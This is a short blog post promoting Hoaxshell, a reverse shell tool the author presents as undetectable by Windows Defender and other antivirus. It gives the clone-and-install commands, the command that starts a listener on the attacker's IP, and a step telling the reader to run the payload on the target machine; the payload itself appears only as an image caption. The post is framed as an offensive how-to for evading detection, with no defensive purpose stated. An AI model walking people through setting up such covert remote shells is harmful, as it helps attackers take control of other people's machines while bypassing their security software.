Published on

Fully Undetectable Reverse Shells

221 words2 min read
Authors

Frustrated with AVs breaking your shells?

Not to worry anymore I got your back. I will show you how to create a reverse shell which is fully undetectable by Win Defender and other anti virus.


Introducing Hoaxshell 🚗

Hoaxshell

Hoaxshell is a reverse shell which as of writing this post is completely undetectable by Defender and other Anti Viruses.


Setup 📐

git clone https://github.com/t3l3machus/hoaxshell
cd hoaxshell
pip3 install -r requirements.txt

Usage 👊🏻

python3 hoaxshell.py -h
Usage

You need to start by providing an IP to listen on

  1. Find your IP address

sudo ifconfig
IP
  1. Start the listener

python hoaxshell.py -s <Your IP here>
Listener
  1. Run the giant monstrous payload on the target machine

Exploit


You now have a shell 🔥🎊

And the best part? You can now run any command without being detected.

Shell

Running commands

Commands

Anti Virus Fool Proof

AV

Both Defender and Quick Heal are fooled by the payload and do not detect it.

← Back to blogs